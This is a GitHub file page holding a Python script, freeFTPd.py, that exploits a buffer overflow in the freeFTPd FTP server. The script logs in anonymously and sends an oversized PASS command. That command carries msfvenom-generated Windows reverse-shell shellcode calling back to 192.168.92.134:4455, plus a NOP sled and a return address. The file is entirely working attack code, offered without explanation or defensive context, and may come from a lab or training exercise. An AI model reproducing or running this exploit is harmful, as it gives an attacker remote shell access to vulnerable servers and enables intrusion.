-
Notifications
You must be signed in to change notification settings - Fork 5
Expand file tree
/
Copy pathfreeFTPd.py
More file actions
54 lines (47 loc) · 2.69 KB
/
freeFTPd.py
File metadata and controls
54 lines (47 loc) · 2.69 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
import socket
import sys
rhost = "192.168.1.100" # Target RHOST
rport = int('21') # Target RPORT
ftpuser = 'anonymous' # Login with FTP username. This account MUST exist and permit anonymous login
ret = "\xbb\x14\x40\x00" # Return address - Source Metasploit (Little Endian)
nop = "\x90" * (801-9-351) # NOP string must be 801-9-$(payload size) below
#msfvenom -p windows/shell_reverse_tcp LHOST=192.168.92.134 LPORT=4455 -f python -b '\x00\x0a\x0d' EXITFUNC=thread
#Payload size: 351 bytes
buf = ""
buf += "\xbb\x2f\x19\x1f\x74\xd9\xe5\xd9\x74\x24\xf4\x5a\x31"
buf += "\xc9\xb1\x52\x31\x5a\x12\x03\x5a\x12\x83\xc5\xe5\xfd"
buf += "\x81\xe5\xfe\x80\x6a\x15\xff\xe4\xe3\xf0\xce\x24\x97"
buf += "\x71\x60\x95\xd3\xd7\x8d\x5e\xb1\xc3\x06\x12\x1e\xe4"
buf += "\xaf\x99\x78\xcb\x30\xb1\xb9\x4a\xb3\xc8\xed\xac\x8a"
buf += "\x02\xe0\xad\xcb\x7f\x09\xff\x84\xf4\xbc\xef\xa1\x41"
buf += "\x7d\x84\xfa\x44\x05\x79\x4a\x66\x24\x2c\xc0\x31\xe6"
buf += "\xcf\x05\x4a\xaf\xd7\x4a\x77\x79\x6c\xb8\x03\x78\xa4"
buf += "\xf0\xec\xd7\x89\x3c\x1f\x29\xce\xfb\xc0\x5c\x26\xf8"
buf += "\x7d\x67\xfd\x82\x59\xe2\xe5\x25\x29\x54\xc1\xd4\xfe"
buf += "\x03\x82\xdb\x4b\x47\xcc\xff\x4a\x84\x67\xfb\xc7\x2b"
buf += "\xa7\x8d\x9c\x0f\x63\xd5\x47\x31\x32\xb3\x26\x4e\x24"
buf += "\x1c\x96\xea\x2f\xb1\xc3\x86\x72\xde\x20\xab\x8c\x1e"
buf += "\x2f\xbc\xff\x2c\xf0\x16\x97\x1c\x79\xb1\x60\x62\x50"
buf += "\x05\xfe\x9d\x5b\x76\xd7\x59\x0f\x26\x4f\x4b\x30\xad"
buf += "\x8f\x74\xe5\x62\xdf\xda\x56\xc3\x8f\x9a\x06\xab\xc5"
buf += "\x14\x78\xcb\xe6\xfe\x11\x66\x1d\x69\xde\xdf\x1c\x7c"
buf += "\xb6\x1d\x1e\x7f\xfd\xab\xf8\x15\x11\xfa\x53\x82\x88"
buf += "\xa7\x2f\x33\x54\x72\x4a\x73\xde\x71\xab\x3a\x17\xff"
buf += "\xbf\xab\xd7\x4a\x9d\x7a\xe7\x60\x89\xe1\x7a\xef\x49"
buf += "\x6f\x67\xb8\x1e\x38\x59\xb1\xca\xd4\xc0\x6b\xe8\x24"
buf += "\x94\x54\xa8\xf2\x65\x5a\x31\x76\xd1\x78\x21\x4e\xda"
buf += "\xc4\x15\x1e\x8d\x92\xc3\xd8\x67\x55\xbd\xb2\xd4\x3f"
buf += "\x29\x42\x17\x80\x2f\x4b\x72\x76\xcf\xfa\x2b\xcf\xf0"
buf += "\x33\xbc\xc7\x89\x29\x5c\x27\x40\xea\x6c\x62\xc8\x5b"
buf += "\xe5\x2b\x99\xd9\x68\xcc\x74\x1d\x95\x4f\x7c\xde\x62"
buf += "\x4f\xf5\xdb\x2f\xd7\xe6\x91\x20\xb2\x08\x05\x40\x97"
exploit = buf + nop + "\xe9\xe3\xfc\xff\xff" + "\xeb\xf9" + "\x90\x90" + ret
password = "PASS " + exploit + "\r\n"
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Declare a TCP socket
client.connect((rhost,rport)) #Connect to TCP socket
client.recv(1024)
client.sendall("USER " + ftpuser + "\r\n") #Login with FTP creds
client.recv(1024)
client.sendall(password) # Send buffer overflow
client.close()
print("\nDone!")